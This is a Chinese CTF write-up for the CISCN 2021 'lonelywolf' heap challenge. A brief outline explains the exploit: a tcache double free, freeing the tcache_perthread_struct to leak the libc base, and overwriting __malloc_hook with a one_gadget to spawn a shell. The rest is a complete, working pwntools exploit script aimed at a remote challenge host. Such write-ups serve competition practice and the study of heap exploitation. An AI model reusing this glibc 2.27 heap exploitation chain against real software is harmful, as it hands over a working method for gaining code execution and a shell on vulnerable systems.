Problem: [CISCN 2021 初赛]lonelywolf
思路先double free拿到chunk地址
要点是libc2.27后期有key 需要先清空fd
泄露了可以拿到tcache_pthread_struct
然后改idx为7认为满了 释放tcache_pthread_struct 然后拿到main_arena 得到Libc_base
然后修复一下结构 比如0x80的idx 和0x80对应chunk的地址改成malloc_hook - 0x17 这个的size位是7d可以用
然后就写脏数据到__malloc_hook
写一个One_gadget 然后直接调用malloc完成getshell
EXP from pwn import *
context.log_level = 'debug'
p = remote("node4.anna.nssctf.cn",28937)
e = ELF('./lonelywolf')
libc = ELF('/home/rick/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')
def new(idx,size):
p.sendlineafter(b'Your choice: ',str(1))
p.sendlineafter(b'Index:',str(0))
p.sendlineafter(b'Size:',str(size))
def edit(idx,content):
p.sendlineafter(b'Your choice: ',str(2))
p.sendlineafter(b'Index:',str(idx))
p.sendlineafter(b'Content: ',content)
def show(idx):
p.sendlineafter(b'Your choice: ',str(3))
p.sendlineafter(b'Index:',str(idx))
def free(idx):
p.sendlineafter(b'Your choice: ',str(4))
p.sendlineafter(b'Index:',str(idx))
new(0,0x78)
free(0)
edit(0,b'a'*16)
free(0)
show(0)
p.recvuntil(b"Content: ")
heap_address = u64(p.recv(6).ljust(8,b'\x00'))
log.success("leak head_address=>"+hex(heap_address))
tcache_struct_addr = heap_address & 0xFFFFFFFFF000
log.success("leak tcache_struct_addr=>"+hex(tcache_struct_addr))
edit(0,p64(tcache_struct_addr+0x10))
new(0,0x78)
new(0,0x78)
edit(0,p64(0)*4+p64(0x7000000))
free(0)
show(0)
p.recvuntil(b"Content: ")
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - 96 - 0x10 - libc.sym["__malloc_hook"]
malloc = libc_base + libc.sym["__malloc_hook"]
log.success("leak libc_base=>"+hex(libc_base))
log.success("leak malloc=>"+hex(malloc))
edit(0,p64(0x1000000000000)+p64(0)*13+p64(libc_base + libc.sym["__malloc_hook"] - 0x17))
new(0,0x78)
og=[0x10a41c,0x4f302,0xe54f7,0xe54fe,0xe5502,0x10a2fc,0x10a308]
edit(0,b'a'*0x17+p64(libc_base+og[0]))
new(0,0x78)
p.interactive()
总结
| 